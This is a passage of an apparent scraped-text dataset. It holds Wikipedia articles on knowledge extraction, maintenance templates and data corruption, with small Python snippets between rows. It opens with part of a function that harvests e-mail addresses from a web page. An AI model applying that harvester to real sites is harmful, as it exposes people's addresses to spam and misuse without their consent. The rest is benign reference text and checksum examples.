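        html = requests.get(url, timeout=10).text
    except requests.RequestException as exc:
        print(f"Request failed: {exc}")
        return []
    # Deliberately simple pattern; real-world e-mail matching is messier.
    pattern = r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}"
    return sorted(set(re.findall(pattern, html)))

# Example usage:
# print(scrape_emails("https://example.com"))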
660 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Knowledge_extraction | Knowledge extraction is the creation of knowledge from structured (relational databases, XML) and unstructured (text, documents, images) sources. The resulting knowledge needs to be in a machine-readable and machine-interpretable format and must represent knowledge in a manner that facilitates inferencing. Although it is methodically similar to information extraction (NLP) and ETL (data warehouse), the main criterion is that the extraction result goes beyond the creation of structured information or the transformation into a relational schema. It requires either the reuse of existing formal knowledge (reusing identifiers or ontologies) or the generation of a schema based on the source data. The RDB2RDF W3C group 1 is currently standardizing a language for extraction of resource description frameworks (RDF) from relational databases. Another popular example for knowledge extraction is the transformation of Wikipedia into structured data and also the mapping to existing knowledge (see DBpedia and Freebase). After the standardization of knowledge representation languages such as RDF and OWL, much research has been conducted in the area, especially regarding transforming relational databases into RDF, identity resolution, knowledge discovery and ontology learning. The general process uses traditional methods from information extraction and extract, transform, and load (ETL), which transform the data from the sources into structured formats. The following criteria can be used to categorize approaches in this topic (some of them only account for extraction from relational databases): 2 President Obama called Wednesday on Congress to extend a tax break for students included in last year's economic stimulus package, arguing that the policy provides more generous assistance. When building a RDB representation of a problem domain, the starting point is frequently an entity-relationship diagram (ERD). Typically, each entity is represented as a database table, each attribute of the entity becomes a column in that table, and relationships between entities are indicated by foreign keys. Each table typically defines a particular class of entity, each column one of its attributes. Each row in the table describes an entity instance, uniquely identified by a primary key. The table rows collectively describe an entity set. In an equivalent RDF representation of the same entity set: So, to render an equivalent view based on RDF semantics, the basic mapping algorithm would be as follows: Early mentioning of this basic or direct mapping can be found in Tim Berners-Lee's comparison of the ER model to the RDF model. 4 The 1:1 mapping mentioned above exposes the legacy data as RDF in a straightforward way, additional refinements can be employed to improve the usefulness of RDF output respective the given Use Cases. Normally, information is lost during the transformation of an entity-relationship diagram (ERD) to relational tables (Details can be found in object-relational impedance mismatch) and has to be reverse engineered. From a conceptual view, approaches for extraction can come from two directions. The first direction tries to extract or learn an OWL schema from the given database schema. Early approaches used a fixed amount of manually created mapping rules to refine the 1:1 mapping. 
5 6 7 More elaborate methods are employing heuristics or learning algorithms to induce schematic information (methods overlap with ontology learning). While some approaches try to extract the information from the structure inherent in the SQL schema 8 (analysing e.g. foreign keys), others analyse the content and the values in the tables to create conceptual hierarchies 9 (e.g. a columns with few values are candidates for becoming categories). The second direction tries to map the schema and its contents to a pre-existing domain ontology (see also: ontology alignment). Often, however, a suitable domain ontology does not exist and has to be created first. As XML is structured as a tree, any data can be easily represented in RDF, which is structured as a graph. XML2RDF is one example of an approach that uses RDF blank nodes and transforms XML elements and attributes to RDF properties. The topic however is more complex as in the case of relational databases. In a relational table the primary key is an ideal candidate for becoming the subject of the extracted triples. An XML element, however, can be transformed - depending on the context- as a subject, a predicate or object of a triple. XSLT can be used a standard transformation language to manually convert XML to RDF. The largest portion of information contained in business documents (about 80% 10 ) is encoded in natural language and therefore unstructured. Because unstructured data is rather a challenge for knowledge extraction, more sophisticated methods are required, which generally tend to supply worse results compared to structured data. The potential for a massive acquisition of extracted knowledge, however, should compensate the increased complexity and decreased quality of extraction. In the following, natural language sources are understood as sources of information, where the data is given in an unstructured fashion as plain text. If the given text is additionally embedded in a markup document (e. g. HTML document), the mentioned systems normally remove the markup elements automatically. As a preprocessing step to knowledge extraction, it can be necessary to perform linguistic annotation by one or multiple NLP tools. Individual modules in an NLP workflow normally build on tool-specific formats for input and output, but in the context of knowledge extraction, structured formats for representing linguistic annotations have been applied. Typical NLP tasks relevant to knowledge extraction include: In NLP, such data is typically represented in TSV formats (CSV formats with TAB as separators), often referred to as CoNLL formats. For knowledge extraction workflows, RDF views on such data have been created in accordance with the following community standards: Other, platform-specific formats include Traditional information extraction 20 is a technology of natural language processing, which extracts information from typically natural language texts and structures these in a suitable manner. The kinds of information to be identified must be specified in a model before beginning the process, which is why the whole process of traditional Information Extraction is domain dependent. The IE is split in the following five subtasks. The task of named entity recognition is to recognize and to categorize all named entities contained in a text (assignment of a named entity to a predefined category). This works by application of grammar based methods or statistical models. 
Coreference resolution identifies equivalent entities, which were recognized by NER, within a text. There are two relevant kinds of equivalence relationship. The first one relates to the relationship between two different represented entities (e.g. IBM Europe and IBM) and the second one to the relationship between an entity and their anaphoric references (e.g. it and IBM). Both kinds can be recognized by coreference resolution. During template element construction the IE system identifies descriptive properties of entities, recognized by NER and CO. These properties correspond to ordinary qualities like red or big. Template relation construction identifies relations, which exist between the template elements. These relations can be of several kinds, such as works-for or located-in, with the restriction, that both domain and range correspond to entities. In the template scenario production events, which are described in the text, will be identified and structured with respect to the entities, recognized by NER and CO and relations, identified by TR. Ontology-based information extraction 10 is a subfield of information extraction, with which at least one ontology is used to guide the process of information extraction from natural language text. The OBIE system uses methods of traditional information extraction to identify concepts, instances and relations of the used ontologies in the text, which will be structured to an ontology after the process. Thus, the input ontologies constitute the model of information to be extracted. 21 Ontology learning is the automatic or semi-automatic creation of ontologies, including extracting the corresponding domain's terms from natural language text. As building ontologies manually is extremely labor-intensive and time consuming, there is great motivation to automate the process. During semantic annotation, 22 natural language text is augmented with metadata (often represented in RDFa), which should make the semantics of contained terms machine-understandable. At this process, which is generally semi-automatic, knowledge is extracted in the sense, that a link between lexical terms and for example concepts from ontologies is established. Thus, knowledge is gained, which meaning of a term in the processed context was intended and therefore the meaning of the text is grounded in machine-readable data with the ability to draw inferences. Semantic annotation is typically split into the following two subtasks. At the terminology extraction level, lexical terms from the text are extracted. For this purpose a tokenizer determines at first the word boundaries and solves abbreviations. Afterwards terms from the text, which correspond to a concept, are extracted with the help of a domain-specific lexicon to link these at entity linking. In entity linking 23 a link between the extracted lexical terms from the source text and the concepts from an ontology or knowledge base such as DBpedia is established. For this, candidate-concepts are detected appropriately to the several meanings of a term with the help of a lexicon. Finally, the context of the terms is analyzed to determine the most appropriate disambiguation and to assign the term to the correct concept. 
Note that "semantic annotation" in the context of knowledge extraction is not to be confused with semantic parsing as understood in natural language processing (also referred to as "semantic annotation"): Semantic parsing aims a complete, machine-readable representation of natural language, whereas semantic annotation in the sense of knowledge extraction tackles only a very elementary aspect of that. The following criteria can be used to categorize tools, which extract knowledge from natural language text. The following table characterizes some tools for Knowledge Extraction from natural language sources. Knowledge discovery describes the process of automatically searching large volumes of data for patterns that can be considered knowledge about the data. 44 It is often described as deriving knowledge from the input data. Knowledge discovery developed out of the data mining domain, and is closely related to it both in terms of methodology and terminology. 45 The most well-known branch of data mining is knowledge discovery, also known as knowledge discovery in databases (KDD). Just as many other forms of knowledge discovery it creates abstractions of the input data. The knowledge obtained through the process may become additional data that can be used for further usage and discovery. Often the outcomes from knowledge discovery are not actionable, actionable knowledge discovery, also known as domain driven data mining, 46 aims to discover and deliver actionable knowledge and insights. Another promising application of knowledge discovery is in the area of software modernization, weakness discovery and compliance which involves understanding existing software artifacts. This process is related to a concept of reverse engineering. Usually the knowledge obtained from existing software is presented in the form of models to which specific queries can be made when necessary. An entity relationship is a frequent format of representing knowledge obtained from existing software. Object Management Group (OMG) developed the specification Knowledge Discovery Metamodel (KDM) which defines an ontology for the software assets and their relationships for the purpose of performing knowledge discovery in existing code. Knowledge discovery from existing software systems, also known as software mining is closely related to data mining, since existing software artifacts contain enormous value for risk management and business value, key for the evaluation and evolution of software systems. Instead of mining individual data sets, software mining focuses on metadata, such as process flows (e.g. data flows, control flows, call maps), architecture, database schemas, and business rules terms process. |
661 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Help:Maintenance_template_removal | Many Wikipedia pages display maintenance templates that identify problems. You may have arrived at this help page after clicking a link on a maintenance template saying "Learn how and when to remove this template message". Maintenance templates are added and removed by volunteers. This help page explains the process for examining and removing such templates. Maintenance templates (or "tags") are not removed automatically. Even if you fix the issue(s) described in a maintenance template, the tag will remain in the article until you or someone else manually removes it. The mechanics of removal are usually as simple as clicking "Edit" at the top of the page or in the section involved (if you're not already in edit mode), removing the code that produces the display of the template, leaving an edit summary, and saving the page. It is not okay to remove maintenance templates until the issue flagged by the template is remedied first—that is, until the maintenance tag is no longer valid—unless it truly did not belong in the first place. Wikipedia works because of the efforts of volunteers just like you, making bold edits to help build this encyclopedia. Fixing problems and then removing maintenance templates when you are done is important in that effort. We don't know which maintenance tag brought you to this page, and thus what specific problem needs attention. However, every maintenance template contains links to help pages, policies, guidelines, or other relevant pages that provide information on the problem the template was placed to flag. You will also find guidance on some of the more common templates below. Many common templates address problems with article citations and references, or their lack because reliable sourcing is the lifeblood of Wikipedia articles and at the core of all of Wikipedia's content policies and guidelines, such as notability, verifiability, neutral point of view, and no original research. But a host of other issues may be flagged, including tone and style of writing, structure, and formatting, lack of links to or from other articles, compliance with Wikipedia's manual of style and the lack of a lead section. Please make sure the issue has been resolved before removing the template. That does require some effort on your part—to understand both the problem and how to solve it. If the issue flagged by the maintenance template is that the article contains no references, a citation needed template used might be Unreferenced typically placed by the code you would see when wikitext (source) editing: Unreferenced date August 2024 . It is important to understand that what you see when reading an article, and what you see when editing it, are different unless you're in Visual editing mode. Thus, the above code, only seen when doing source editing, results in the display of the 'called' template below: This template contains several links, indicated by the words and phrases in blue. Three of these links are to pages that, when explored, provide context and resources for you to understand why the template was placed on the page, and how to address the issue of the article being unreferenced: Whatever maintenance tag brought you to this help page should likewise contain relevant explanatory links addressed to whatever its issue is. Read these explanatory and contextual pages to learn about the problem and what it is you need to do to take care of it. 
Again, some of the more common maintenance templates seen are addressed in the specific template guidance section below. Maintenance templates are not meant to be in articles permanently. Any user without a conflict of interest may remove a maintenance template in any of the following circumstances: You should not remove maintenance templates if any of the following apply: Have you carefully read the help pages and thoroughly fixed the problem? Or have you made a considered decision that the template is not, or is no longer, applicable? Great Now, to remove the maintenance template: That's it. Thank you Problems flagged by some templates may imply secondary problems that will still exist after you take care of the main issue. In such cases, it may be more appropriate to switch the template to another applicable one following your edits, rather than just removing it. The reasoning behind the change in templates should be addressed in the edit summary. A case in point is the Unreferenced template example used above. It is placed on pages with no references. Thus, adding just one suitable reference renders that maintenance template inapplicable. However, that change does not take care of the overarching issue of poor sourcing. In this example, a change to a different template may be appropriate, depending on the type, quality, depth, and manner of sourcing added to fix the issue, such as refimprove , No footnotes , Primary sources , or one of the many others listed at Wikipedia:Template messages Sources of articles. Conversely, some templates flag highly discrete issues where there is no need to consider a switch to another template. For example, if an article is "orphaned" no other articles in the main article namespace link to it then once that is taken care of (by the addition of links to it from other articles), the issue is gone entirely and the tag's removal is unambiguous. When a flagged issue has been addressed in parts of an article but remains in discrete sections, clarity may be served by replacing the template with a section variant, or by use of inline cleanup tags, if such versions of the template exist. In some cases, it may be helpful to request a review of a maintenance template's removal or proposed removal with the editor who initially added it to the article at issue. This section guides you on how to address some of the more common specific templates that may have brought you to this help page. More detailed information about the templates can be found by following the links to the templates themselves. Click "show" at the right to display the instructions. Some articles will be flagged for multiple discrete problems using a single template: Multiple issues . If you take care of one or more problems that it flags but not all, do not remove the template entirely but just those parameters in it that you have fixed. The example below shows three different issues flagged by this template: If you address the "orphaning" issue, but not the other two, remove just the line that flagged the orphan issue and leave the others intact. Thus, your removal would leave the template in this state. See the sections below for how to address some of the more common problems flagged by templates that may be wrapped into this template. All of Wikipedia's core content policies and guidelines have as a common denominator the need for reliable sourcing. 
For example, the content of Wikipedia articles must be verifiable in reliable sources; the notability of a topic demonstrated through such reliable sources that are secondary in nature, which are independent of the topic and treat the subject in substantive detail (not just "mere mentions"); and to establish that the content is not original research, the sources cited must directly support the material being presented without analysis or synthesis to reach or imply a conclusion that is not stated in the sources. Unreferenced , typically placed by the code Unreferenced date August 2024 , having redirects such as Unsourced , Unverified , No references , No sources , and Unref , and displaying when reading as: flags the issue of an article containing no references at all. This template no longer applies once a single reference appears in the article, whether placed through the preferred method of inline citations, ones appearing in a general references section, or even through such a poor method as including an embedded raw link. To address the issue, add citations to reliable sources. Because of their importance, Wikipedia contains numerous instruction pages on aspects of referencing. We suggest starting with Help:Referencing for beginners and Help:Introduction to referencing 1, and then seeing Wikipedia:Citing sources for a more involved treatment, noting that each contains see also sections linking to additional help pages, guides, and tutorials. A visual guide to placing inline citations through ref ... ref tags may also help, and appears below. In brief, anywhere you want a footnote to appear in a piece of text, you place an opening ref tag followed by the text of the citation which you want to appear at the bottom of the article, and close with a ref tag. Note the closing slash ( ). For multiple use of a single reference, the opening ref tag is given a name, like so: ref name "name" followed by the citation text and a closing ref tag. Each time you want to use that footnote again, you simply use the first element with a slash, like so: ref name "name" . For these references to appear, you must tell the software where to display them, using either the code references or, most commonly, the template, Reflist which can be modified to display the references in columns using Reflist colwidth 30em . Per our style guidelines, the references should be displayed in a separate section denominated "References" located after the body of the article. Multiple ref name "multiple" Citation text3. ref citation ref name "multiple" use. ref name "multiple" References Reflist Multiple 3 citation 3 use. 3 References Citation Cite web Cite book Cite news Cite journal Others Examples As noted higher on this page, unless you thoroughly source a page in response to this template, it may more appropriate to switch this template with a more specific one rather than simply removing it. Depending on the type, quality, depth, and manner of sourcing added to fix the issue, you might replace it with refimprove , No footnotes , Primary sources or a host of others listed at Wikipedia:Template messages Sources of articles. All of Wikipedia's core content policies and guidelines have as a common denominator the need for reliable sourcing. 
For example, the content of Wikipedia articles must be verifiable in reliable sources; the notability of a topic demonstrated through such reliable sources that are secondary in nature, which are independent of the topic and treat the subject in substantive detail (not just "mere mentions"); and to establish that the content is not original research, the sources cited must directly support the material being presented without analysis or synthesis to reach or imply a conclusion that is not stated in the sources. Refimprove , typically placed by the code Refimprove date August 2024 , having redirects such as Improve references , Verify , More sources and Citations needed , and displaying when reading as: flags the issue of an article that has some, but insufficient inline citations to support the material currently in the article. It should not be used for articles with no sources at all ( unreferenced should be used instead), nor for articles without inline citations but which contain some sources ( No footnotes should be used instead), nor for an article on living persons ( BLP sources should be used instead). This template no longer applies once an article has been made fairly well-sourced. To address the issue, add additional inline citations to reliable sources for all significant statements in the article. Whether or not an article has been rendered "fairly well sourced" may involve a judgment call, but in any event, the sources used must be reliable ones, and articles should not rely predominantly on primary sources, but rather on secondary sources. Note the minimum: all quotations, material whose verifiability has been challenged or is likely to be challenged, and contentious material, whether negative, positive, or neutral, about living persons, must include an inline citation that directly supports the material. All of Wikipedia's core content policies and guidelines have a common denominator: the need for reliable sourcing. For example, the content of Wikipedia articles must be verifiable in reliable sources; the notability of a topic demonstrated through such reliable sources that are secondary in nature, which are independent of the topic and treat the subject in substantive detail (not just "mere mentions"); and to establish that the content is not original research, the sources cited must directly support the material being presented without analysis or synthesis to reach or imply a conclusion that is not stated in the sources. No footnotes , typically placed by the code No footnotes date August 2024 , and having redirects such as Citations , No citations , Inline citations and No inline citations , and displaying when reading as: flags the issue of an article that contains some form of sourcing but lacks the precision of inline citations to associate given portions of material with a specific reliable source(s) that support that material. Inline citations make verifiability accessible. In short, in the absence of an inline citation that associates specific material to a specific source, it becomes very difficult for a reader to check what sources, given in only some general manner, verify what items of content. To address the issue, add inline citations to reliable sources, ideally for all significant statements in the article. 
Note that at a minimum: all quotations, material whose verifiability has been challenged or is likely to be challenged, and contentious material, whether negative, positive, or neutral, about living persons, must include an inline citation that directly supports the material. There are many instruction pages that directly and indirectly give guidance on adding inline citations. We suggest starting with Help:Referencing for beginners and Help:Introduction to referencing 1, and then seeing Wikipedia:Citing sources for a more involved treatment, noting that each contains see also sections linking to additional help pages, guides, and tutorials. A visual guide to placing inline citations through ref ... ref tags may also help, and appears below. In brief, anywhere you want a footnote to appear in a piece of text, you place an opening ref tag followed by the text of the citation which you want to appear at the bottom of the article, and close with a ref tag. Note the closing slash ( ). For multiple use of a single reference, the opening ref tag is given a name, like so: ref name "name" followed by the citation text and a closing ref tag. Each time you want to use that footnote again, you simply use the first element with a slash, like so: ref name "name" . For these references to appear, you must tell the software where to display them, using either the code references or, most commonly, the template, Reflist which can be modified to display the references in columns using Reflist colwidth 30em . Per our style guidelines, the references should be displayed in a separate section denominated "References" located after the body of the article. Multiple ref name "multiple" Citation text3. ref citation ref name "multiple" use. ref name "multiple" References Reflist Multiple 3 citation 3 use. 3 References Citation Cite web Cite book Cite news Cite journal Others Examples Primary sources , typically placed by the code Primary sources date August 2024 , having among other redirects Primary , and displaying when reading as: flags the issue of an article that too heavily relies on primary sources original materials that are close to an event; often accounts written by people who are directly involved as opposed to secondary, and to some extent, tertiary sources. Primary sources have their place but they must be used carefully and are easy to misuse. Typically, they should only be used for straightforward, descriptive statements of facts that can be verified by any educated person with access to the primary source but without further, specialized knowledge. They should not be used to support content that presents interpretation, analysis, evaluation, or synthesis, and should not be the predominant form of sourcing in an article. Moreover, primary sources are generally not useful to demonstrate a topic's notability. To address the issue, add citations predominantly to secondary sources. Often this involves replacing some of the primary sources with secondary sources, and not just adding them alongside existing ones—especially where the primary source is being used for an invalid purpose such as interpretive claims and synthesis. Finding secondary sources is a large topic but make use of Google Books, News, and Scholar; find local newspaper archives; go to a library; if you have access, use pay subscription services like JSTOR, Newspaperarchive.com; Ancestry.com, etc.; see our guide on free English newspaper sources and others listed here; request access to pay prescription sources at WP:RX. 
If insufficient reliable secondary and independent sources exist treating a topic in substantive detail, then Wikipedia should not have an article on the topic. Remember that no amount of editing can overcome a lack of notability. Wikipedia is an encyclopedia, a specific type of reference work properly containing articles on topics of knowledge. Wikipedia employs the concept of notability to avoid indiscriminate inclusion of topics by attempting to ensure that the subjects of articles are "worthy of notice" by only including articles on topics that the world has taken note of by substantively treating them in reliable sources unconnected with the topic. The general notability standard thus presumes that topics are notable if they have "received significant coverage in reliable sources that are independent of the subject". Notability , typically placed by the code Notability date August 2024 , having redirects such as Notable , Non-notable , Nn and Significance , and displaying when reading as: (or some variation linking to one of the subject-specific notability guidelines) questions whether a topic is notable. As stated in the template, addressing the issue requires adding citations to reliable secondary sources. There are several common mistakes seen in addressing this issue: If insufficient reliable secondary and independent sources exist treating a topic in substantive detail, then Wikipedia should not have an article on the topic. Remember that no amount of editing can overcome a lack of notability. Advert , typically placed by the code Advert date August 2024 , and having redirects such as Advertisement , Advertising , Ad and Puff , and displaying when reading as: flags the issue of an article that reads like an advertisement. For example, such articles may tell users to buy a company's product, provide price lists, give links to online sellers, use unencyclopedic or meaningless buzzwords, be filled with peacock language and read like the website of the article's topic or a press release touting its virtues, rather than that of a neutrally-written encyclopedia article about the topic. Advertisements are by no means limited to commercial topics and indeed are often seen for all manner of others, such as "noble causes", religious spiritual leaders, sports teams, gaming clans and so forth. If the article's main problem is not advertising per se, then you can change the tag to something more appropriate, such as COI or Peacock or POV check . Pages that are exclusively promotional and would need to be fundamentally rewritten to become encyclopedic may be tagged for speedy deletion under section G11 of the criteria using db-g11 or db-spam . To address the issue, rewrite the article from a neutral point of view which is not just about the wording and tone, but also what the article covers and what it does not cover. Wikipedia articles should represent fairly, proportionately, and, as far as possible, without editorial bias, all of the significant views that have been published by reliable sources on a topic. Removing all promotional language is a good start, but depending on what is left, may only be a surface treatment. See what you can salvage, but often editors strip out all but the most basic content, leaving it in a stub state. If you want to build a solid article, explore the existence of independent sources for the topic, and build it from the ground up. 
POV , typically placed by the code POV date August 2024 , and having redirects such as NPOV , POV dispute , Neutrality , Neutral and Not neutral , and displaying when reading as: flags the issue of an article that has been identified as having a serious issue of balance, the lack of a neutral point of view, and the tagger wishes to attract editors with different viewpoints to the article. An unbalanced or non-neutral article does not fairly represent the balance of perspectives of high-quality, reliable secondary sources. This tag is meant to be accompanied by an explanation on the article's talk page about why it was added, identifying specific issues that are actionable within Wikipedia's content policies. This template is not meant to be a permanent resident on any article. You may remove this template whenever any one of the following is true: Lead missing , typically placed by the code Lead missing date August 2024 , and having redirects such as No lead , Nointro , No lead section , Lead absent and Intro needed , and displaying when reading as: flags the issue of an article that fails to follow Wikipedia's standard article layout guidelines by introducing the reader to the topic in a lead section containing a summary of the most important article contents. The lead should stand on its own as a concise overview of the article's topic. A good lead section cultivates the reader's interest in reading more of the article, but not by teasing the reader or hinting at content that follows. It should identify the topic, establish context, explain why the topic is notable, and summarize the most important points, including any prominent controversies. To address the issue, write a lead section. The size of an appropriate lead will depend on the breadth of the article but it should be no more than four well-composed paragraphs, and should generally not contain content that is not already present in the body of the article. Current , typically placed by the code Current date August 2024 , and displaying when reading as: (or a subject-specific variation listed on Wikipedia:Current event templates) warns editors and readers about an article that is the subject of a current event, such as a breaking news story, that is accordingly experiencing a great flux of edits and is in a fast-changing state. Wikipedia attracts numerous editors who want to update articles in real time immediately after such current events are published. However, sources for breaking news reports often contain serious inaccuracies, so these templates can also draw attention to the need to add improved sources as soon as they become available. The template should generally be removed when the event described is no longer receiving massive editing attention. It is not meant to be a general disclaimer indicating that an article's contents may not be accurate, or to mark an article that merely has recent news articles about the topic (if it were, hundreds of thousands of articles would have the Current template, with no informational consequence). If the article continues to have sourcing or cleanup issues, a more appropriate maintenance template should be used instead. Linkrot , typically placed by the code Linkrot date August 2024 , and displaying when reading as: flags an article as having bare URLs, URLs that are used as references or external links without contextual information. 
These bare URLs are particularly vulnerable to link rot, as the record of the reference depends on the hosting website maintaining the current site structure, which is not guaranteed. A change in the underlying URL could make the reference unusable. The full citation format, on the other hand, preserves information (such as title and author) that can be used to restore a version of the reference that is still accessible. In addition, bare URLs can be less visually pleasing if the underlying URL is long. To address this issue, convert all bare URLs used as references to the appropriate citation template format. For bare URLs which are not used as references, use the following format: bare URL Descriptive text . Depending on the specific URL, it may be necessary to use an archiving service to restore an URL. More information is available at Repairing a dead link. As noted previously, most templates contain links to guidance pages. Additionally, many templates have documentation that provides more information about the template's flagged issue, which is displayed when you visit the template page itself. To access the template and thereby see its documentation, type into the search field Template:, followed by the name of the template, seen when you view its placement in the Edit interface (typically found in the first lines of the article). The first "parameter" is the name of the template. For example, if you found this in the Edit interface, Unreferenced date August 2024 , then you would visit the template itself by searching for Template:Unreferenced. The accompanying documentation for all maintenance templates, if it exists, can be located in this way. If you've read through this page and are still confused about what needs to be done to fix an issue on a page and remove a maintenance template, try asking at the Teahouse, a page designed for new users to ask questions. Alternatively, you could try the more general Help desk, or seek live assistance at the IRC channel: wikipedia-en-help. |
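Where the flagged bare URLs first have to be located, a short script can list them for review before they are expanded into full citations. This is only a rough sketch: the pattern below is a simplified URL matcher, the sample string is invented for illustration, and deciding which matches are truly "bare" (used as references without a citation template) still needs a human eye.

import re

# Simplified URL pattern; it will not match every possible URL form.
URL_PATTERN = re.compile(r'https?://[^\s<>"\')\]]+')

def list_urls(text: str) -> list[str]:
    """Return every URL-looking substring so it can be reviewed by hand."""
    return URL_PATTERN.findall(text)

sample = "A bare reference: https://example.com/report-2024 (retrieved today)."
print(list_urls(sample))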
662 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_corruption | Data corruption refers to errors in computer data that occur during writing, reading, storage, transmission, or processing, which introduce unintended changes to the original data. Computer, transmission, and storage systems use a number of measures to provide end-to-end data integrity, or lack of errors. In general, when data corruption occurs, a file containing that data will produce unexpected results when accessed by the system or the related application. Results could range from a minor loss of data to a system crash. For example, if a document file is corrupted, a person trying to open that file with a document editor may get an error message, and the file might not open at all or might open with some of the data corrupted (or in some cases completely corrupted, leaving the document unintelligible). Some types of malware may intentionally corrupt files as part of their payloads, usually by overwriting them with inoperative or garbage code, while a non-malicious virus may also unintentionally corrupt files when it accesses them. If a virus or trojan with this payload method manages to alter files critical to the running of the computer's operating system software or physical hardware, the entire system may be rendered unusable. Some programs can offer to repair the file automatically after such an error, while others cannot; whether repair is possible depends on the level of corruption and on the application's built-in ability to handle the error. Data corruption has a variety of causes. There are two types of data corruption associated with computer systems: undetected and detected. Undetected data corruption, also known as silent data corruption, results in the most dangerous errors, as there is no indication that the data is incorrect. Detected data corruption may be permanent with the loss of data, or may be temporary when some part of the system is able to detect and correct the error; there is no data corruption in the latter case. Data corruption can occur at any level in a system, from the host to the storage medium. Modern systems attempt to detect corruption at many layers and then recover or correct it; this is almost always successful, but in rare cases the information arriving in the system's memory is corrupted and can cause unpredictable results. Data corruption during transmission has a variety of causes. Interruption of data transmission causes information loss. Environmental conditions can interfere with data transmission, especially when dealing with wireless transmission methods. Heavy clouds can block satellite transmissions. Wireless networks are susceptible to interference from devices such as microwave ovens. Hardware and software failure are the two main causes of data loss. Background radiation, head crashes, and aging or wear of the storage device fall into the former category, while software failure typically occurs due to bugs in the code. Cosmic rays cause most soft errors in DRAM. 1 Some errors go unnoticed, without being detected by the disk firmware or the host operating system; these errors are known as silent data corruption. 2 There are many error sources beyond the disk storage subsystem itself.
For instance, cables might be slightly loose, the power supply might be unreliable, 3 external vibrations such as a loud sound, 4 the network might introduce undetected corruption, 5 cosmic radiation and many other causes of soft memory errors, etc. In 39,000 storage systems that were analyzed, firmware bugs accounted for 5 to 10% of storage failures. 6 All in all, the error rates as observed by a CERN study on silent corruption are far higher than one in every 10^16 bits. 7 Webshop Amazon.com has acknowledged similar high data corruption rates in their systems. 8 In 2021, faulty processor cores were identified as an additional cause in publications by Google and Facebook; cores were found to be faulty at a rate of several in thousands of cores. 9 10 One problem is that hard disk drive capacities have increased substantially, but their error rates remain unchanged. The data corruption rate has always been roughly constant in time, meaning that modern disks are not much safer than old disks. In old disks the probability of data corruption was very small because they stored tiny amounts of data. In modern disks the probability is much larger because they store much more data, whilst not being safer. That way, silent data corruption has not been a serious concern while storage devices remained relatively small and slow. In modern times and with the advent of larger drives and very fast RAID setups, users are capable of transferring 10^16 bits in a reasonably short time, thus easily reaching the data corruption thresholds. 11 As an example, ZFS creator Jeff Bonwick stated that the fast database at Greenplum, which is a database software company specializing in large-scale data warehousing and analytics, faces silent corruption every 15 minutes. 12 As another example, a real-life study performed by NetApp on more than 1.5 million HDDs over 41 months found more than 400,000 silent data corruptions, out of which more than 30,000 were not detected by the hardware RAID controller (only detected during scrubbing). 13 Another study, performed by CERN over six months and involving about 97 petabytes of data, found that about 128 megabytes of data became permanently corrupted silently somewhere in the pathway from network to disk. 14 Silent data corruption may result in cascading failures, in which the system may run for a period of time with undetected initial error causing increasingly more problems until it is ultimately detected. 15 For example, a failure affecting file system metadata can result in multiple files being partially damaged or made completely inaccessible as the file system is used in its corrupted state. When data corruption behaves as a Poisson process, where each bit of data has an independently low probability of being changed, data corruption can generally be detected by the use of checksums, and can often be corrected by the use of error correcting codes (ECC). If an uncorrectable data corruption is detected, procedures such as automatic retransmission or restoration from backups can be applied. Certain levels of RAID disk arrays have the ability to store and evaluate parity bits for data across a set of hard disks and can reconstruct corrupted data upon the failure of a single or multiple disks, depending on the level of RAID implemented. Some CPU architectures employ various transparent checks to detect and mitigate data corruption in CPU caches, CPU buffers and instruction pipelines; an example is Intel Instruction Replay technology, which is available on Intel Itanium processors.
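A minimal sketch of the checksum-based detection just described, using CRC32 from Python's standard zlib module. The payloads are made up for illustration, and a plain checksum can only detect corruption; correcting it needs ECC or a redundant copy, as the paragraph above notes.

import zlib

def write_with_checksum(payload: bytes) -> tuple[bytes, int]:
    # Store a CRC32 alongside the data at write time.
    return payload, zlib.crc32(payload)

def read_and_verify(payload: bytes, stored_crc: int) -> bytes:
    # Recompute the CRC32 on read and compare it with the stored value.
    if zlib.crc32(payload) != stored_crc:
        raise IOError("checksum mismatch: data corruption detected")
    return payload

data, crc = write_with_checksum(b"important record")
read_and_verify(data, crc)               # intact data passes silently
corrupted = b"impartant record"          # simulate a flipped byte in storage
try:
    read_and_verify(corrupted, crc)
except IOError as err:
    print(err)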
16 Many errors are detected and corrected by the hard disk drives using the ECC codes 17 which are stored on disk for each sector. If the disk drive detects multiple read errors on a sector it may make a copy of the failing sector on another part of the disk, by remapping the failed sector of the disk to a spare sector without the involvement of the operating system (though this may be delayed until the next write to the sector). This "silent correction" can be monitored using S.M.A.R.T. and tools available for most operating systems to automatically check the disk drive for impending failures by watching for deteriorating SMART parameters. Some file systems, such as Btrfs, HAMMER, ReFS, and ZFS, use internal data and metadata checksumming to detect silent data corruption. In addition, if a corruption is detected and the file system uses integrated RAID mechanisms that provide data redundancy, such file systems can also reconstruct corrupted data in a transparent way. 18 This approach allows improved data integrity protection covering the entire data paths, which is usually known as end-to-end data protection, compared with other data integrity approaches that do not span different layers in the storage stack and allow data corruption to occur while the data passes boundaries between the different layers. 19 Data scrubbing is another method to reduce the likelihood of data corruption, as disk errors are caught and recovered from before multiple errors accumulate and overwhelm the number of parity bits. Instead of parity being checked on each read, the parity is checked during a regular scan of the disk, often done as a low priority background process. The "data scrubbing" operation activates a parity check. If a user simply runs a normal program that reads data from the disk, then the parity would not be checked unless parity-check-on-read was both supported and enabled on the disk subsystem. If appropriate mechanisms are employed to detect and remedy data corruption, data integrity can be maintained. This is particularly important in commercial applications (e.g. banking), where an undetected error could either corrupt a database index or change data to drastically affect an account balance, and in the use of encrypted or compressed data, where a small error can make an extensive dataset unusable. 7 |
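The idea behind scrubbing can be imitated in user space: periodically re-read data and compare it against stored digests so that silent corruption is noticed before errors pile up. The sketch below is only an analogy; real scrubbing in ZFS, Btrfs or RAID works on blocks, checksums and parity inside the storage stack, and the data directory here is hypothetical.

import hashlib
from pathlib import Path

def build_manifest(root: Path) -> dict[Path, str]:
    # Record a SHA-256 digest for every file under the given directory.
    return {p: hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}

def scrub(manifest: dict[Path, str]) -> list[Path]:
    # Re-read each file and report any whose digest no longer matches.
    return [p for p, digest in manifest.items()
            if hashlib.sha256(p.read_bytes()).hexdigest() != digest]

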